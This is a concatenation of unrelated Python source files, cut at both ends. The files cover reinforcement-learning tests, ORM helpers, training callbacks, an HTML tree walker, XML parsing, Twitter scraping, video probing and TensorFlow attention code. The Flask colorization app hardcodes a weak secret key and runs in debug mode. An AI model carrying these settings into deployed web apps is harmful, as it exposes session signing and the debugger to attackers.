return PresenceMessage.from_encoded_array(messages, cipher=cipher)
return encrypted_presence_response_handler
|
65534
|
from collections import namedtuple
import tensorflow as tf
import numpy as np
from rl.agents.a2c.agent import A2CAgent
TestArgType = namedtuple('ArgType', ['name'])
arg_type = TestArgType('arg')
A = np.array
class A2CAgentTest(tf.test.TestCase):
def test_compute_policy_log_probs(self):
from rl.agents.a2c.agent import compute_policy_log_probs
available_actions = A([[1, 0, 1],
[1, 0, 0],
[1, 1, 1]], dtype=np.float32)
fn_pi = A([[0.2, 0.0, 0.8],
[1.0, 0.0, 0.0],
[0.2, 0.7, 0.1]], dtype=np.float32)
fn_ids = A([2, 0, 1], dtype=np.int32)
arg_pi = {arg_type: A([[0.8, 0.2],
[0.0, 1.0],
[0.5, 0.5]], dtype=np.float32)}
arg_ids = {arg_type: A([0, 1, -1], dtype=np.int32)}
log_probs = compute_policy_log_probs(
available_actions, (fn_pi, arg_pi), (fn_ids, arg_ids)
)
expected_log_probs = np.log([0.8, 1.0, 0.7]) + A([np.log(0.8), np.log(1.0), 0])
with self.test_session() as sess:
log_probs_out = sess.run(log_probs)
self.assertAllClose(log_probs_out, expected_log_probs)
def test_compute_policy_entropy(self):
from rl.agents.a2c.agent import compute_policy_entropy
available_actions = A([[1, 0, 1],
[1, 0, 0],
[1, 1, 1]], dtype=np.float32)
fn_pi = A([[0.2, 0.0, 0.8],
[1.0, 0.0, 0.0],
[0.2, 0.7, 0.1]], dtype=np.float32)
fn_ids = A([2, 0, 1], dtype=np.int32)
arg_pi = {arg_type: A([[0.8, 0.2],
[0.0, 1.0],
[0.5, 0.5]], dtype=np.float32)}
arg_ids = {arg_type: A([0, 1, -1], dtype=np.int32)}
entropy = compute_policy_entropy(
available_actions, (fn_pi, arg_pi), (fn_ids, arg_ids)
)
expected_entropy = (0.50040245 + 0.80181855) / 3.0 + (0.50040245) / 2
with self.test_session() as sess:
entropy_out = sess.run(entropy)
self.assertAllClose(entropy_out, expected_entropy)
if __name__ == '__main__':
tf.test.main()
|
65548
|
from oso import Oso
from .auth import register_models
class SQLAlchemyOso(Oso):
"""The central object to manage application policy state, e.g.
the policy data, and verify requests when using Oso with SQLAlchemy.
Supports SQLAlchemy-specific functionality, including data filtering.
Accepts a SQLAlchemy declarative_base on initialization, which is used to register
all relevant SQLAlchemy models with Oso.
>>> from sqlalchemy_oso import SQLAlchemyOso
>>> from sqlalchemy.ext.declarative import declarative_base
>>> Base = declarative_base(name="MyBaseModel")
>>> SQLAlchemyOso(Base)
<sqlalchemy_oso.oso.SQLAlchemyOso object at 0x...>
"""
def __init__(self, sqlalchemy_base):
super().__init__()
# Register all sqlalchemy models on sqlalchemy_base
register_models(self, sqlalchemy_base)
self.base = sqlalchemy_base
|
65551
|
import logging
from helium.common.managers.basemanager import BaseManager, BaseQuerySet
__author__ = "<NAME>"
__copyright__ = "Copyright 2019, Helium Edu"
__version__ = "1.4.38"
logger = logging.getLogger(__name__)
class EventQuerySet(BaseQuerySet):
def exists_for_user(self, id, user_id):
return self.filter(pk=id, user_id=user_id).exists()
def for_user(self, user_id):
return self.filter(user_id=user_id)
class EventManager(BaseManager):
def get_queryset(self):
return EventQuerySet(self.model, using=self._db)
def exists_for_user(self, id, user_id):
return self.get_queryset().exists_for_user(id, user_id)
def for_user(self, user_id):
return self.get_queryset().for_user(user_id)
|
65609
|
import pytest
from unittest.mock import patch
import tests.fixtures.journal as FakeJournalExporter
from systemdlogger.elasticsearch import ElasticsearchLogger
@pytest.mark.parametrize(('config_path'), [
'tests/fixtures/config_es.json'
])
class TestRunner:
def setup_method(self, method):
""" setup any state tied to the execution of the given method in a
class. setup_method is invoked for every test method of a class.
"""
modules = {
'systemdlogger.journal': FakeJournalExporter
}
self.module_patcher = patch.dict('sys.modules', modules)
self.module_patcher.start()
from systemdlogger.runner import Runner
self.Runner = Runner
def teardown_method(self, method):
""" teardown any state that was previously setup with a setup_method
call.
"""
self.module_patcher.stop()
def test_init(self, config_path):
runner = self.Runner(config_path)
assert len(runner.loggers) == 1
assert isinstance(runner.loggers[0], ElasticsearchLogger)
def test_run(self, config_path):
runner = self.Runner(config_path)
runner.run()
|
65616
|
from .base import TrainingCallback, ValueTrainingCallback
class LearningRateScheduler(TrainingCallback):
"""
The learning rate scheduler may be used with a PyTorch learning rate scheduler. The callback is
automatically triggered after the end of every iteration or epoch.
"""
def __init__(self, scheduler, metric=None, after_batch=False):
"""
Initializes a new learning rate scheduler for the given PyTorch scheduler.
Parameters
----------
scheduler: torch.optim.lr_scheduler
The PyTorch scheduler.
metric: str, default: None
The metric to pass to the scheduler, e.g. useful for reducing the learning rate as the
validation loss pleateaus. Typically, it should only be used with :code:`after_batch`
set to `False`.
after_batch: bool, default: False
Whether to call the scheduler after every batch or after every epoch.
"""
self.exec_after_batch = after_batch
self.metric = metric
self.scheduler = scheduler
def after_batch(self, metrics):
if self.exec_after_batch:
self._exec(metrics)
def after_epoch(self, metrics):
if not self.exec_after_batch:
self._exec(metrics)
def _exec(self, metrics):
if self.metric is not None:
self.scheduler.step(metrics[self.metric])
else:
self.scheduler.step()
class ParameterScheduler(ValueTrainingCallback):
"""
The parameter scheduler is able to change the value of a variable over the course of the
training.
"""
def __init__(self, initial, schedule, *args, **kwargs):
r"""
Initalizes a new scheduler for the given parameter.
Parameters
----------
initial: object
The initial value fo the parameter which should be modified over the course of the
training.
schedule: func (object, int, int, \**kwargs) -> object
Function which should return the value of the parameter based on the current value of
the parameter, the current epoch, and the iteration within the epoch. The function is
called after every iteration (i.e. batch). It is further passed the arguments given to
this initializer.
args: variadic argument
Additional arguments passed to the :code:`schedule` function.
kwargs: keyword arguments
Additional keyword arguments passed to the :code:`schedule` function.
"""
self.parameter = initial
self.schedule = schedule
self.args = args
self.kwargs = kwargs
self.epoch = None
self.iteration = None
def read(self):
return self.parameter
def before_training(self, model, num_epochs):
self.iteration = 0
def before_epoch(self, current, num_iterations):
self.epoch = current
def after_batch(self, metrics):
self.iteration += 1
self._update()
def after_epoch(self, metrics):
self._update()
def after_training(self):
self.epoch = None
self.iteration = None
def _update(self):
self.parameter = self.schedule(
self.parameter, self.epoch, self.iteration, *self.args, **self.kwargs
)
|
65629
|
from __future__ import absolute_import, division, unicode_literals
from genshi.core import QName
from genshi.core import START, END, XML_NAMESPACE, DOCTYPE, TEXT
from genshi.core import START_NS, END_NS, START_CDATA, END_CDATA, PI, COMMENT
from . import base
from ..constants import voidElements, namespaces
class TreeWalker(base.TreeWalker):
def __iter__(self):
# Buffer the events so we can pass in the following one
previous = None
for event in self.tree:
if previous is not None:
for token in self.tokens(previous, event):
yield token
previous = event
# Don't forget the final event!
if previous is not None:
for token in self.tokens(previous, None):
yield token
def tokens(self, event, next):
kind, data, _ = event
if kind == START:
tag, attribs = data
name = tag.localname
namespace = tag.namespace
converted_attribs = {}
for k, v in attribs:
if isinstance(k, QName):
converted_attribs[(k.namespace, k.localname)] = v
else:
converted_attribs[(None, k)] = v
if namespace == namespaces["html"] and name in voidElements:
for token in self.emptyTag(namespace, name, converted_attribs,
not next or next[0] != END or
next[1] != tag):
yield token
else:
yield self.startTag(namespace, name, converted_attribs)
elif kind == END:
name = data.localname
namespace = data.namespace
if namespace != namespaces["html"] or name not in voidElements:
yield self.endTag(namespace, name)
elif kind == COMMENT:
yield self.comment(data)
elif kind == TEXT:
for token in self.text(data):
yield token
elif kind == DOCTYPE:
yield self.doctype(*data)
elif kind in (XML_NAMESPACE, DOCTYPE, START_NS, END_NS,
START_CDATA, END_CDATA, PI):
pass
else:
yield self.unknown(kind)
|
65631
|
from __future__ import absolute_import
from django.conf import settings
from api.mon.backends import zabbix
from api.mon.backends import dummy
__all__ = ('get_monitoring', 'del_monitoring', 'MonitoringBackend', 'MonitoringServer')
BACKEND_ALIASES = {
'dummy': dummy,
'zabbix': zabbix,
}
DEFAULT_BACKEND = 'zabbix'
backend = BACKEND_ALIASES[getattr(settings, 'MONITORING_BACKEND', DEFAULT_BACKEND)]
MonitoringBackend = backend.MonitoringBackendClass
MonitoringServer = backend.MonitoringServerClass
MonitoringBackend.server_class = MonitoringServer
def get_monitoring(dc, **kwargs):
return backend.get_monitoring(dc, **kwargs)
def del_monitoring(dc):
return backend.del_monitoring(dc)
|
65647
|
from copy import deepcopy
import six
from lxml import etree
from regparser import plugins
from regparser.tree.xml_parser.preprocessors import replace_html_entities
class XMLWrapper(object):
"""Wrapper around XML which provides a consistent interface shared by both
Notices and Annual editions of XML"""
def __init__(self, xml, source=None):
"""Includes automatic conversion from string and a deep copy for
safety. `source` represents the providence of this xml. It is _not_
serialized and hence does not follow the xml through the index"""
if isinstance(xml, six.binary_type):
xml = replace_html_entities(xml)
self.xml = etree.fromstring(xml)
elif isinstance(xml, etree._Element):
self.xml = deepcopy(xml)
else:
raise ValueError("xml should be either binary or an lxml node")
self.source = source
def preprocess(self):
"""Unfortunately, the notice xml is often inaccurate. This function
attempts to fix some of those (general) flaws. For specific issues, we
tend to instead use the files in settings.LOCAL_XML_PATHS"""
for plugin in plugins.instantiate_if_possible(
'eregs_ns.parser.preprocessors', method_name='transform'):
plugin(self.xml)
return self
def xpath(self, *args, **kwargs):
return self.xml.xpath(*args, **kwargs)
def xml_str(self):
return etree.tounicode(self.xml, pretty_print=True)
def _find_or_create(self, tag):
"""Look for the first matching tag present in the document. If it's
not present, create it by inserting it into the root"""
matches = self.xpath('//' + tag)
if matches:
return matches[0]
else:
return etree.SubElement(self.xml, tag)
|
65668
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
print 'hello world'
|
65673
|
import sys
import base_func as base
import twint
from similar_hashtags import similar_hashtags
from top_mentions_hashtags import top_mentions_hashtags as mentions
def basic(username,search):
base.get_user_bio(username,search)
base.get_user_tweets(username,search,True)
def get_keyword(key,limit=100):
base.get_tweets(key,limit)
def top_mention():
key_val = int(input('no of users'))
seed_user = list(map(str,input('Enter usernames').strip().split()))[:key_val]
limit = int(input('No of tweets to be pulled')) # default limit = 500
for username in seed_user:
mentions.get_top_mentions_hashtags(username)
def similar_hashtag():
key_val = int(input('no of hastags'))
seed_hash = list(map(str,input('Enter hashtags').strip().split()))[:key_val]
limit = int(input('No of tweets to be pulled')) # default limit = 500
for seed_hashtag in seed_hash:
similar_hashtags.get_similar_hashtags(seed_hashtag, limit)
if __name__ == "__main__":
username = sys.argv[1]
string = sys.argv[2]
basic(username,string)
|
65745
|
from flask import Flask, flash, request, redirect, url_for, render_template
from werkzeug.utils import secure_filename
import os
from keras.models import load_model
from keras.applications.inception_resnet_v2 import InceptionResNetV2
import tensorflow as tf
from skimage.io import imsave
from skimage.transform import resize
import numpy as np
from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img
from skimage.color import rgb2lab, lab2rgb, rgb2gray, gray2rgb
from keras.applications.inception_resnet_v2 import preprocess_input
from PIL import Image,ImageChops
import logging
global graph
graph = tf.get_default_graph()
app = Flask(__name__)
app.secret_key = "hello"
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])
model = load_model('trained-model.h5')
UPLOAD_FOLDER = '/home/nubaf/Git-Projects/colorization/files'
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
files = [f for f in os.listdir('.') if os.path.isfile(f)]
checkInception = False
for f in files:
if f == "inception.h5":
checkInception = True
inception = load_model('inception.h5', compile=False)
break
if not checkInception:
inception = InceptionResNetV2(weights='imagenet', include_top=True)
inception.save('inception.h5')
inception.graph = graph
def create_inception_embedding(grayscaled_rgb):
grayscaled_rgb_resized = []
for i in grayscaled_rgb:
i = resize(i, (299, 299, 3), mode='constant')
grayscaled_rgb_resized.append(i)
grayscaled_rgb_resized = np.array(grayscaled_rgb_resized)
grayscaled_rgb_resized = preprocess_input(grayscaled_rgb_resized)
with graph.as_default():
embed = inception.predict(grayscaled_rgb_resized)
return embed
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
try:
url = request.form['url']
if 'examples' in url:
color_file = process(url)
return render_template('index.html', res='static/examples/girl.jpg')
# check if the post request has the file part
except:
logging.exception('')
if 'file' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['file']
# if user does not select file, browser also
# submit an empty part without filename
if file.filename == '':
flash('No selected file')
return redirect(request.url)
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
color_file = process(file.filename)
return render_template('index.html', og=color_file[0], res=color_file[1])
return render_template('index.html')
def process(img):
if 'examples' in img:
im = Image.open(img)
name = img.split('.')[0].split('/')[-1]
else:
im = Image.open('files/' + img)
name = img.split('.')[0]
old_size = im.size # old_size[0] is in (width, height) format
ratio = float(256)/max(old_size)
new_size = tuple([int(x*ratio) for x in old_size])
im = im.resize(new_size, Image.ANTIALIAS)
new_im = Image.new("RGB", (256, 256))
new_im.paste(im, ((256-new_size[0])//2,(256-new_size[1])//2))
new_im.save('static/processed_png/' + name + ".png","PNG")
a = np.array(img_to_array(load_img('static/processed_png/' + name +'.png')))
a = a.reshape(1,256,256,3)
#gray_me = gray2rgb(rgb2gray(1.0/255*a))
color_me_embed = create_inception_embedding(a)
a = rgb2lab(1.0/255*a)[:,:,:,0]
a = a.reshape(a.shape+(1,))
with graph.as_default():
output = model.predict([a, color_me_embed])
output = output * 128
for i in range(len(output)):
cur = np.zeros((256, 256, 3))
cur[:,:,0] = a[i][:,:,0]
cur[:,:,1:] = output[i]
imsave(f'static/colored_img/{name}.png',(lab2rgb(cur)))
trim(Image.open(f'static/processed_png/{name}.png')).save(f'static/processed_png/{name}.png')
trim(Image.open(f'static/colored_img/{name}.png')).save(f'static/colored_img/{name}.png')
return (f'static/processed_png/{name}.png',f'static/colored_img/{name}.png')
def trim(im):
bg = Image.new(im.mode, im.size, im.getpixel((0,0)))
diff = ImageChops.difference(im, bg)
diff = ImageChops.add(diff, diff, 2.0, -100)
bbox = diff.getbbox()
if bbox:
return im.crop(bbox)
if __name__ == "__main__":
app.run(debug=True)
|
65764
|
import math
from ffmpeg import probe
def get_bitrate(video_path):
bitrate = probe(video_path)['format']['bit_rate']
return f'{math.trunc(int(bitrate) / 1000)} kbit/s'
def get_framerate_fraction(video_path):
r_frame_rate = [stream for stream in probe(video_path)['streams']
if stream['codec_type'] == 'video'][0][
'r_frame_rate']
return r_frame_rate
def get_framerate_float(video_path):
numerator, denominator = get_framerate_fraction(video_path).split('/')
return round((int(numerator) / int(denominator)), 3)
def get_duration(video_path):
return probe(video_path)['format']['duration']
def get_mbit_str(megabits):
return f'{megabits} Mbps'
def get_pretty_codec_name(codec):
dict = {
'h264': 'H.264 (AVC)',
'hevc': 'H.265 (HEVC)'
}
return dict.get(codec, codec)
|
65828
|
import tensorflow as tf
import math
from tensorflow.contrib.rnn import BasicLSTMCell, RNNCell, DropoutWrapper, MultiRNNCell
from rnn import stack_bidirectional_dynamic_rnn, CellInitializer, GRUCell, DropoutGRUCell
import utils, beam_search
def auto_reuse(fun):
"""
Wrapper that automatically handles the `reuse' parameter.
This is rather risky, as it can lead to reusing variables
by mistake.
"""
def fun_(*args, **kwargs):
try:
return fun(*args, **kwargs)
except ValueError as e:
if 'reuse' in str(e):
with tf.variable_scope(tf.get_variable_scope(), reuse=True):
return fun(*args, **kwargs)
else:
raise e
return fun_
get_variable = auto_reuse(tf.get_variable)
dense = auto_reuse(tf.layers.dense)
class CellWrapper(RNNCell):
"""
Wrapper around LayerNormBasicLSTMCell, BasicLSTMCell and MultiRNNCell, to keep
the state_is_tuple=False behavior (soon to be deprecated).
"""
def __init__(self, cell):
super(CellWrapper, self).__init__()
self.cell = cell
self.num_splits = len(cell.state_size) if isinstance(cell.state_size, tuple) else 1
@property
def state_size(self):
return sum(self.cell.state_size)
@property
def output_size(self):
return self.cell.output_size
def __call__(self, inputs, state, scope=None):
state = tf.split(value=state, num_or_size_splits=self.num_splits, axis=1)
new_h, new_state = self.cell(inputs, state, scope=scope)
return new_h, tf.concat(new_state, 1)
def multi_encoder(encoder_inputs, encoders, encoder_input_length, other_inputs=None, **kwargs):
"""
Build multiple encoders according to the configuration in `encoders`, reading from `encoder_inputs`.
The result is a list of the outputs produced by those encoders (for each time-step), and their final state.
:param encoder_inputs: list of tensors of shape (batch_size, input_length), one tensor for each encoder.
:param encoders: list of encoder configurations
:param encoder_input_length: list of tensors of shape (batch_size,) (one tensor for each encoder)
:return:
encoder outputs: a list of tensors of shape (batch_size, input_length, encoder_cell_size), hidden states of the
encoders.
encoder state: concatenation of the final states of all encoders, tensor of shape (batch_size, sum_of_state_sizes)
new_encoder_input_length: list of tensors of shape (batch_size,) with the true length of the encoder outputs.
May be different than `encoder_input_length` because of maxout strides, and time pooling.
"""
encoder_states = []
encoder_outputs = []
# create embeddings in the global scope (allows sharing between encoder and decoder)
embedding_variables = []
for encoder in encoders:
if encoder.binary:
embedding_variables.append(None)
continue
# inputs are token ids, which need to be mapped to vectors (embeddings)
embedding_shape = [encoder.vocab_size, encoder.embedding_size]
if encoder.embedding_initializer == 'sqrt3':
initializer = tf.random_uniform_initializer(-math.sqrt(3), math.sqrt(3))
else:
initializer = None
device = '/cpu:0' if encoder.embeddings_on_cpu else None
with tf.device(device): # embeddings can take a very large amount of memory, so
# storing them in GPU memory can be impractical
embedding = get_variable('embedding_{}'.format(encoder.name), shape=embedding_shape,
initializer=initializer)
embedding_variables.append(embedding)
new_encoder_input_length = []
for i, encoder in enumerate(encoders):
if encoder.use_lstm is False:
encoder.cell_type = 'GRU'
with tf.variable_scope('encoder_{}'.format(encoder.name)):
encoder_inputs_ = encoder_inputs[i]
encoder_input_length_ = encoder_input_length[i]
def get_cell(input_size=None, reuse=False):
if encoder.cell_type.lower() == 'lstm':
cell = CellWrapper(BasicLSTMCell(encoder.cell_size, reuse=reuse))
elif encoder.cell_type.lower() == 'dropoutgru':
cell = DropoutGRUCell(encoder.cell_size, reuse=reuse, layer_norm=encoder.layer_norm,
input_size=input_size, input_keep_prob=encoder.rnn_input_keep_prob,
state_keep_prob=encoder.rnn_state_keep_prob)
else:
cell = GRUCell(encoder.cell_size, reuse=reuse, layer_norm=encoder.layer_norm)
if encoder.use_dropout and encoder.cell_type.lower() != 'dropoutgru':
cell = DropoutWrapper(cell, input_keep_prob=encoder.rnn_input_keep_prob,
output_keep_prob=encoder.rnn_output_keep_prob,
state_keep_prob=encoder.rnn_state_keep_prob,
variational_recurrent=encoder.pervasive_dropout,
dtype=tf.float32, input_size=input_size)
return cell
embedding = embedding_variables[i]
batch_size = tf.shape(encoder_inputs_)[0]
time_steps = tf.shape(encoder_inputs_)[1]
if embedding is not None:
flat_inputs = tf.reshape(encoder_inputs_, [tf.multiply(batch_size, time_steps)])
flat_inputs = tf.nn.embedding_lookup(embedding, flat_inputs)
encoder_inputs_ = tf.reshape(flat_inputs,
tf.stack([batch_size, time_steps, flat_inputs.get_shape()[1].value]))
if other_inputs is not None:
encoder_inputs_ = tf.concat([encoder_inputs_, other_inputs], axis=2)
if encoder.use_dropout:
noise_shape = [1, time_steps, 1] if encoder.pervasive_dropout else [batch_size, time_steps, 1]
encoder_inputs_ = tf.nn.dropout(encoder_inputs_, keep_prob=encoder.word_keep_prob,
noise_shape=noise_shape)
size = tf.shape(encoder_inputs_)[2]
noise_shape = [1, 1, size] if encoder.pervasive_dropout else [batch_size, time_steps, size]
encoder_inputs_ = tf.nn.dropout(encoder_inputs_, keep_prob=encoder.embedding_keep_prob,
noise_shape=noise_shape)
if encoder.input_layers:
for j, layer_size in enumerate(encoder.input_layers):
if encoder.input_layer_activation is not None and encoder.input_layer_activation.lower() == 'relu':
activation = tf.nn.relu
else:
activation = tf.tanh
encoder_inputs_ = dense(encoder_inputs_, layer_size, activation=activation, use_bias=True,
name='layer_{}'.format(j))
if encoder.use_dropout:
encoder_inputs_ = tf.nn.dropout(encoder_inputs_, keep_prob=encoder.input_layer_keep_prob)
# Contrary to Theano's RNN implementation, states after the sequence length are zero
# (while Theano repeats last state)
inter_layer_keep_prob = None if not encoder.use_dropout else encoder.inter_layer_keep_prob
parameters = dict(
inputs=encoder_inputs_, sequence_length=encoder_input_length_,
dtype=tf.float32, parallel_iterations=encoder.parallel_iterations
)
input_size = encoder_inputs_.get_shape()[2].value
state_size = (encoder.cell_size * 2 if encoder.cell_type.lower() == 'lstm' else encoder.cell_size)
def get_initial_state(name='initial_state'):
if encoder.train_initial_states:
initial_state = get_variable(name, initializer=tf.zeros(state_size))
return tf.tile(tf.expand_dims(initial_state, axis=0), [batch_size, 1])
else:
return None
if encoder.bidir:
rnn = lambda reuse: stack_bidirectional_dynamic_rnn(
cells_fw=[get_cell(input_size if j == 0 else 2 * encoder.cell_size, reuse=reuse)
for j in range(encoder.layers)],
cells_bw=[get_cell(input_size if j == 0 else 2 * encoder.cell_size, reuse=reuse)
for j in range(encoder.layers)],
initial_states_fw=[get_initial_state('initial_state_fw')] * encoder.layers,
initial_states_bw=[get_initial_state('initial_state_bw')] * encoder.layers,
time_pooling=encoder.time_pooling, pooling_avg=encoder.pooling_avg,
**parameters)
initializer = CellInitializer(encoder.cell_size) if encoder.orthogonal_init else None
with tf.variable_scope(tf.get_variable_scope(), initializer=initializer):
try:
encoder_outputs_, _, encoder_states_ = rnn(reuse=False)
except ValueError: # Multi-task scenario where we're reusing the same RNN parameters
encoder_outputs_, _, encoder_states_ = rnn(reuse=True)
else:
if encoder.time_pooling or encoder.final_state == 'concat_last':
raise NotImplementedError
if encoder.layers > 1:
cell = MultiRNNCell([get_cell(input_size if j == 0 else encoder.cell_size)
for j in range(encoder.layers)])
initial_state = (get_initial_state(),) * encoder.layers
else:
cell = get_cell(input_size)
initial_state = get_initial_state()
encoder_outputs_, encoder_states_ = auto_reuse(tf.nn.dynamic_rnn)(cell=cell,
initial_state=initial_state,
**parameters)
last_backward = encoder_outputs_[:, 0, encoder.cell_size:]
indices = tf.stack([tf.range(batch_size), encoder_input_length_ - 1], axis=1)
last_forward = tf.gather_nd(encoder_outputs_[:, :, :encoder.cell_size], indices)
last_forward.set_shape([None, encoder.cell_size])
if encoder.final_state == 'concat_last': # concats last states of all backward layers (full LSTM states)
encoder_state_ = tf.concat(encoder_states_, axis=1)
elif encoder.final_state == 'average':
mask = tf.sequence_mask(encoder_input_length_, maxlen=tf.shape(encoder_outputs_)[1], dtype=tf.float32)
mask = tf.expand_dims(mask, axis=2)
encoder_state_ = tf.reduce_sum(mask * encoder_outputs_, axis=1) / tf.reduce_sum(mask, axis=1)
elif encoder.final_state == 'average_inputs':
mask = tf.sequence_mask(encoder_input_length_, maxlen=tf.shape(encoder_inputs_)[1], dtype=tf.float32)
mask = tf.expand_dims(mask, axis=2)
encoder_state_ = tf.reduce_sum(mask * encoder_inputs_, axis=1) / tf.reduce_sum(mask, axis=1)
elif encoder.bidir and encoder.final_state == 'last_both':
encoder_state_ = tf.concat([last_forward, last_backward], axis=1)
elif encoder.bidir and not encoder.final_state == 'last_forward': # last backward hidden state
encoder_state_ = last_backward
else: # last forward hidden state
encoder_state_ = last_forward
if encoder.bidir and encoder.bidir_projection:
encoder_outputs_ = dense(encoder_outputs_, encoder.cell_size, use_bias=False, name='bidir_projection')
encoder_outputs.append(encoder_outputs_)
encoder_states.append(encoder_state_)
new_encoder_input_length.append(encoder_input_length_)
encoder_state = tf.concat(encoder_states, 1)
return encoder_outputs, encoder_state, new_encoder_input_length
def compute_energy(hidden, state, attn_size, attn_keep_prob=None, pervasive_dropout=False, layer_norm=False,
mult_attn=False, **kwargs):
if attn_keep_prob is not None:
state_noise_shape = [1, tf.shape(state)[1]] if pervasive_dropout else None
state = tf.nn.dropout(state, keep_prob=attn_keep_prob, noise_shape=state_noise_shape)
hidden_noise_shape = [1, 1, tf.shape(hidden)[2]] if pervasive_dropout else None
hidden = tf.nn.dropout(hidden, keep_prob=attn_keep_prob, noise_shape=hidden_noise_shape)
if mult_attn:
state = dense(state, attn_size, use_bias=False, name='state')
hidden = dense(hidden, attn_size, use_bias=False, name='hidden')
return tf.einsum('ijk,ik->ij', hidden, state)
else:
y = dense(state, attn_size, use_bias=not layer_norm, name='W_a')
y = tf.expand_dims(y, axis=1)
if layer_norm:
y = tf.contrib.layers.layer_norm(y, scope='layer_norm_state')
hidden = tf.contrib.layers.layer_norm(hidden, center=False, scope='layer_norm_hidden')
f = dense(hidden, attn_size, use_bias=False, name='U_a')
v = get_variable('v_a', [attn_size])
s = f + y
return tf.reduce_sum(v * tf.tanh(s), axis=2)
def compute_energy_with_filter(hidden, state, prev_weights, attn_filters, attn_filter_length,
**kwargs):
hidden = tf.expand_dims(hidden, 2)
batch_size = tf.shape(hidden)[0]
time_steps = tf.shape(hidden)[1]
attn_size = hidden.get_shape()[3].value
filter_shape = [attn_filter_length * 2 + 1, 1, 1, attn_filters]
filter_ = get_variable('filter', filter_shape)
u = get_variable('U', [attn_filters, attn_size])
prev_weights = tf.reshape(prev_weights, tf.stack([batch_size, time_steps, 1, 1]))
conv = tf.nn.conv2d(prev_weights, filter_, [1, 1, 1, 1], 'SAME')
shape = tf.stack([tf.multiply(batch_size, time_steps), attn_filters])
conv = tf.reshape(conv, shape)
z = tf.matmul(conv, u)
z = tf.reshape(z, tf.stack([batch_size, time_steps, 1, attn_size]))
y = dense(state, attn_size, use_bias=True, name='y')
y = tf.reshape(y, [-1, 1, 1, attn_size])
k = get_variable('W', [attn_size, attn_size])
# dot product between tensors requires reshaping
hidden = tf.reshape(hidden, tf.stack([tf.multiply(batch_size, time_steps), attn_size]))
f = tf.matmul(hidden, k)
f = tf.reshape(f, tf.stack([batch_size, time_steps, 1, attn_size]))
v = get_variable('V', [attn_size])
s = f + y + z
return tf.reduce_sum(v * tf.tanh(s), [2, 3])
def global_attention(state, hidden_states, encoder, encoder_input_length, scope=None, context=None, **kwargs):
with tf.variable_scope(scope or 'attention_{}'.format(encoder.name)):
if context is not None and encoder.use_context:
state = tf.concat([state, context], axis=1)
if encoder.attn_filters:
e = compute_energy_with_filter(hidden_states, state, attn_size=encoder.attn_size,
attn_filters=encoder.attn_filters,
attn_filter_length=encoder.attn_filter_length, **kwargs)
else:
e = compute_energy(hidden_states, state, attn_size=encoder.attn_size,
attn_keep_prob=encoder.attn_keep_prob, pervasive_dropout=encoder.pervasive_dropout,
layer_norm=encoder.layer_norm, mult_attn=encoder.mult_attn, **kwargs)
e -= tf.reduce_max(e, axis=1, keep_dims=True)
mask = tf.sequence_mask(encoder_input_length, maxlen=tf.shape(hidden_states)[1], dtype=tf.float32)
T = encoder.attn_temperature or 1.0
exp = tf.exp(e / T) * mask
weights = exp / tf.reduce_sum(exp, axis=-1, keep_dims=True)
weighted_average = tf.reduce_sum(tf.expand_dims(weights, 2) * hidden_states, axis=1)
return weighted_average, weights
def no_attention(state, hidden_states, *args, **kwargs):
batch_size = tf.shape(state)[0]
weighted_average = tf.zeros(shape=tf.stack([batch_size, 0]))
weights = tf.zeros(shape=[batch_size, tf.shape(hidden_states)[1]])
return weighted_average, weights
def average_attention(hidden_states, encoder_input_length, *args, **kwargs):
# attention with fixed weights (average of all hidden states)
lengths = tf.to_float(tf.expand_dims(encoder_input_length, axis=1))
mask = tf.sequence_mask(encoder_input_length, maxlen=tf.shape(hidden_states)[1])
weights = tf.to_float(mask) / lengths
weighted_average = tf.reduce_sum(hidden_states * tf.expand_dims(weights, axis=2), axis=1)
return weighted_average, weights
def last_state_attention(hidden_states, encoder_input_length, *args, **kwargs):
weights = tf.one_hot(encoder_input_length - 1, tf.shape(hidden_states)[1])
weights = tf.to_float(weights)
weighted_average = tf.reduce_sum(hidden_states * tf.expand_dims(weights, axis=2), axis=1)
return weighted_average, weights
def local_attention(state, hidden_states, encoder, encoder_input_length, pos=None, scope=None,
context=None, **kwargs):
batch_size = tf.shape(state)[0]
attn_length = tf.shape(hidden_states)[1]
if context is not None and encoder.use_context:
state = tf.concat([state, context], axis=1)
state_size = state.get_shape()[1].value
with tf.variable_scope(scope or 'attention_{}'.format(encoder.name)):
encoder_input_length = tf.to_float(tf.expand_dims(encoder_input_length, axis=1))
if pos is not None:
pos = tf.reshape(pos, [-1, 1])
pos = tf.minimum(pos, encoder_input_length - 1)
if pos is not None and encoder.attn_window_size > 0:
# `pred_edits` scenario, where we know the aligned pos
# when the windows size is non-zero, we concatenate consecutive encoder states
# and map it to the right attention vector size.
weights = tf.to_float(tf.one_hot(tf.to_int32(tf.squeeze(pos, axis=1)), depth=attn_length))
weighted_average = []
for offset in range(-encoder.attn_window_size, encoder.attn_window_size + 1):
pos_ = pos + offset
pos_ = tf.minimum(pos_, encoder_input_length - 1)
pos_ = tf.maximum(pos_, 0) # TODO: when pos is < 0, use <S> or </S>
weights_ = tf.to_float(tf.one_hot(tf.to_int32(tf.squeeze(pos_, axis=1)), depth=attn_length))
weighted_average_ = tf.reduce_sum(tf.expand_dims(weights_, axis=2) * hidden_states, axis=1)
weighted_average.append(weighted_average_)
weighted_average = tf.concat(weighted_average, axis=1)
weighted_average = dense(weighted_average, encoder.attn_size)
elif pos is not None:
weights = tf.to_float(tf.one_hot(tf.to_int32(tf.squeeze(pos, axis=1)), depth=attn_length))
weighted_average = tf.reduce_sum(tf.expand_dims(weights, axis=2) * hidden_states, axis=1)
else:
# Local attention of Luong et al. (http://arxiv.org/abs/1508.04025)
wp = get_variable('Wp', [state_size, state_size])
vp = get_variable('vp', [state_size, 1])
pos = tf.nn.sigmoid(tf.matmul(tf.nn.tanh(tf.matmul(state, wp)), vp))
pos = tf.floor(encoder_input_length * pos)
pos = tf.reshape(pos, [-1, 1])
pos = tf.minimum(pos, encoder_input_length - 1)
